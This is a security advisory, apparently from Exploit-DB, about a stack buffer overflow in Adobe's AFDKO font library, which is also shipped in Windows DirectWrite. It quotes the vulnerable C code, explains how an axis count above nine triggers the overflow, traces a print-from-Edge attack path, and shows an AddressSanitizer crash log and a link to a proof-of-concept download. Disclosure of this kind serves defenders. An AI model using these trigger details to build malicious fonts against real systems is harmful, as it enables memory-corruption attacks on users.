AFDKO (Adobe Font Development Kit for OpenType) is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType (to some extent) and several other font formats. While the library existed as early as 2000, it was open-sourced by Adobe in 2014 on GitHub [1, 2], and is still actively developed. The font parsing code can be generally found under afdko/c/public/lib/source/*read/*.c in the project directory tree.
At the time of this writing, based on the available source code, we conclude that AFDKO was originally developed to only process valid, well-formatted font files. It contains very few to no sanity checks of the input data, which makes it susceptible to memory corruption issues (e.g. buffer overflows) and other memory safety problems, if the input file doesn't conform to the format specification.
We have recently discovered that starting with Windows 10 1709 (Fall Creators Update, released in October 2017), Microsoft's DirectWrite library [3] includes parts of AFDKO, and specifically the modules for reading and writing OpenType/CFF fonts (internally called cfr/cfw). The code is reachable through dwrite!AdobeCFF2Snapshot, called by methods of the FontInstancer class, called by dwrite!DWriteFontFace::CreateInstancedStream and dwrite!DWriteFactory::CreateInstancedStream. This strongly indicates that the code is used for instancing the relatively new variable fonts [4], i.e. building a single instance of a variable font with a specific set of attributes. The CreateInstancedStream method is not a member of a public COM interface, but we have found that it is called by d2d1!dxc::TextConvertor::InstanceFontResources, which led us to find out that it can be reached through the Direct2D printing interface. It is unclear if there are other ways to trigger the font instancing functionality.
One example of a client application which uses Direct2D printing is Microsoft Edge. If a user opens a specially crafted website with an embedded OpenType variable font and decides to print it (to PDF, XPS, or another physical or virtual printer), the AFDKO code will execute with the attacker's font file as input.
In this specific case, setting the CFR_FLATTEN_CUBE flag while interacting with AFDKO is required to trigger the bug. According to our analysis, DirectWrite currently doesn't specify this flag, but it still contains the do_set_weight_vector_cube() function including the vulnerable code. In case the code can be reached in a way we haven't considered, or the CFR_FLATTEN_CUBE flag is ever added in the future, we have opted to report the bug despite its apparent unreachability at this time.
-----=====[ Description ]=====-----
The bug resides in the do_set_weight_vector_cube() function in afdko/c/public/lib/source/t2cstr/t2cstr.c, with the following definition:
--- cut ---
985 static int do_set_weight_vector_cube(t2cCtx h, int nAxes) {
--- cut ---
The nAxes parameter can be controlled through the tx_SETWVN instruction:
--- cut ---
1912 case tx_SETWVN: {
1913 int numAxes = (int)POP();
1914 result = do_set_weight_vector_cube(h, numAxes);
1915 if (result || !(h->flags & FLATTEN_CUBE))
1916 return result;
--- cut ---
The assumption is that the number of axes specified by the fon't won't be greater than 9, as specified by the kMaxCubeAxes constant in afdko/c/public/lib/resource/txops.h:
--- cut ---
194 #define kMaxCubeAxes 9
--- cut ---
However this assumption is never explicitly verified in do_set_weight_vector_cube(). As a result, if the FLATTEN_CUBE flag is set in h->flags, the following code will be executed:
--- cut ---
989 int nMasters = 1 << nAxes;
990 float NDV[kMaxCubeAxes];
[...]
1035 while (i < nAxes) {
1036 NDV[i] = (float)((100 + (long)composeOps[3 + i]) / 200.0);
1037 i++;
1038 }
1039
1040 /* Compute Weight Vector */
1041 for (i = 0; i < nMasters; i++) {
1042 h->cube[h->cubeStackDepth].WV[i] = 1;
1043 for (j = 0; j < nAxes; j++)
1044 h->cube[h->cubeStackDepth].WV[i] *= (i & 1 << j) ? NDV[j] : 1 - NDV[j];
1045 }
--- cut ---
If nAxes larger than 9 is specified, the local NDV[] buffer will be overflown in line 1036, followed by another buffer overflow in lines 1042 and 1044, as the WV[] array only consists of 2**9 elements, but the loops will try to write 2**10 or a larger power of 2 of values.
According to our observations, one of the biggest clients of AFDKO, Microsoft DirectWrite, doesn't set the CFR_FLATTEN_CUBE flag while interacting with the library, and is therefore not affected by the vulnerability (because it follows a different path to compose_callback). In the standard "tx" tool, the flag can be toggled on with the "-cubef" argument:
--- cut ---
-cubef flattens Cube source to a normal Type 1 font. Can be used with all output formats
--- cut ---
-----=====[ Proof of Concept ]=====-----
The proof of concept file triggers the bug by using the tx_SETWVN instruction to call do_set_weight_vector_cube(nAxes=16) in the CharString of the "A" glyph.
-----=====[ Crash logs ]=====-----
A crash log from the "tx" tool compiled with AddressSanitizer, run as ./tx -cubef -cff <path to font file>:
--- cut ---
=================================================================
==119029==ERROR: AddressSanitizer: stack-buffer-overflow on address 0xff934174 at pc 0x083112cc bp 0xff934128 sp 0xff934120
WRITE of size 4 at 0xff934174 thread T0
#0 0x83112cb in do_set_weight_vector_cube afdko/c/public/lib/source/t2cstr/t2cstr.c:1036:16
#1 0x82f4112 in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1914:38
#2 0x82e4816 in t2Decode afdko/c/public/lib/source/t2cstr/t2cstr.c:1412:34
#3 0x82da1c4 in t2cParse afdko/c/public/lib/source/t2cstr/t2cstr.c:2591:18
#4 0x8194f84 in readGlyph afdko/c/public/lib/source/cffread/cffread.c:2927:14
#5 0x8194131 in cfrIterateGlyphs afdko/c/public/lib/source/cffread/cffread.c:2966:9
#6 0x8156184 in cfrReadFont afdko/c/tx/source/tx.c:151:18
#7 0x81556df in doFile afdko/c/tx/source/tx.c:429:17
#8 0x8152fc9 in doSingleFileSet afdko/c/tx/source/tx.c:488:5
#9 0x81469a6 in parseArgs afdko/c/tx/source/tx.c:558:17
#10 0x814263f in main afdko/c/tx/source/tx.c:1631:9
#11 0xf7b9c275 in __libc_start_main
#12 0x806a590 in _start
Address 0xff934174 is located in stack of thread T0 at offset 52 in frame
#0 0x83100ef in do_set_weight_vector_cube afdko/c/public/lib/source/t2cstr/t2cstr.c:985
This frame has 1 object(s):
[16, 52) 'NDV' (line 990) <== Memory access at offset 52 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow afdko/c/public/lib/source/t2cstr/t2cstr.c:1036:16 in do_set_weight_vector_cube
Shadow bytes around the buggy address:
0x3ff267d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff267e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff267f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff26800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff26810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x3ff26820: 00 00 00 00 00 00 00 00 f1 f1 00 00 00 00[04]f3
0x3ff26830: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff26840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff26850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff26860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x3ff26870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==119029==ABORTING
--- cut ---
-----=====[ References ]=====-----
[1] https://blog.typekit.com/2014/09/19/new-from-adobe-type-open-sourced-font-development-tools/
[2] https://github.com/adobe-type-tools/afdko
[3] https://docs.microsoft.com/en-us/windows/desktop/directwrite/direct-write-portal
[4] https://medium.com/variable-fonts/https-medium-com-tiro-introducing-opentype-variable-fonts-12ba6cd2369
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47089.zip